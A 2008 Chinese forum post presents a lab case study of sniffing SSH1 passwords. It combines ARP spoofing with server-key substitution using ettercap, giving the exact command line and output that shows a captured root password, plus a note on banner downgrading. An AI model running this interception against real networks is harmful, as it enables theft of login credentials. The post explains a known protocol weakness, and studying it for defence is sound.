案例分析：用MIM技术监听 ssh1口令

wshwqh

好久没有SSH了，就动点心思去连一家的Freebsd主机.结果不太满意。局域网的还行。。\r\n\r\n这方面的技术很多，以前我一直以为ssh1的监听是理论上的，并没有实际使用，即使我知道交换网络监听是没问题的,因此一直没有重视，直到有一次我自己在局域网里面试验了一下。\r\nssh1的MIM攻击是和arp spoof技术相结合的，首先让流向victim的 ssh1连接流经你所控制的机器，你所充当监听的机器实际上充当了路由器的角色，但是，众所周知，ssh1默认是使用3des加密通道的，如何才能获得数据呢？\r\n的确，如果你直接察看ssh1中间的数据，或者拦截 ssh session,没有任何用处，只能得到一堆乱七八糟的东西，但是ssh1在连接握手的时候，需要提交server public key(用ssh client连接的时候会问你要不要保存),而既然我们充当了中间人，所有的包都流经我们这里,我们就可以替换掉server public key. :-)\r\n这样当客户机发来用我们的key算出来的 session key的时候，我们就能够解码并且在用正确的server public key加密报文，在转发出去，我们只是个旁观者，赫赫\r\n当然，这其实就是SSH1( SSH-1.5)协议的薄弱之处.\r\nok,下面就是我的实验结果(我用的工具是ettercap)\r\n[root@server /root]# /usr/local/sbin/ettercap -NCza 192.168.2.30 192.168.2.70 00:01:02:6E:E4:B1 00:04:76:22:27:21\r\n\r\nettercap 0.6.7 (c) 2002 ALoR & NaGA\r\n\r\nYour IP: 192.168.2.252 with MAC: 00:20:55:14:A5:EC on Iface: eth0\r\n\r\nLoading plugins... Done.\r\n\r\nResolving 1 hostnames...\r\n\r\n* |==================================================>| 100.00 %\r\n\r\n\r\nPress \'h\' for help...\r\n\r\nSniffing (ARP based) : 192.168.2.70:0 <--> 192.168.2.252 <--> 192.168.2.30:0\r\n\r\nTCP + UDP packets... (default)\r\n\r\nCollecting passwords... \r\n\r\n\r\n18:15:35 192.168.2.70:3201 <--> 192.168.2.30:22 SSH decrypt\r\n\r\nUSER: root\r\nPASS: MyGodness!\r\n\r\n需要指出的是,ettercap还能够修改连接的banner,如果你兼容了ssh1,ettercap会在中间把banner由原来的 SSH-1.9-xxx修改成SSH-1.5-xxx(即 ssh1), :-(\r\n\r\nssh1发布的时候，对于key改变会出一个警告，但是 SecureCRT只是简单得询问你是否需要保存key,这样很多人都会毫不犹豫的点击 “yes\".... //cry\n\n[ 本帖最后由 云杉上的蝴蝶 于 2008-9-5 00:13 编辑 ]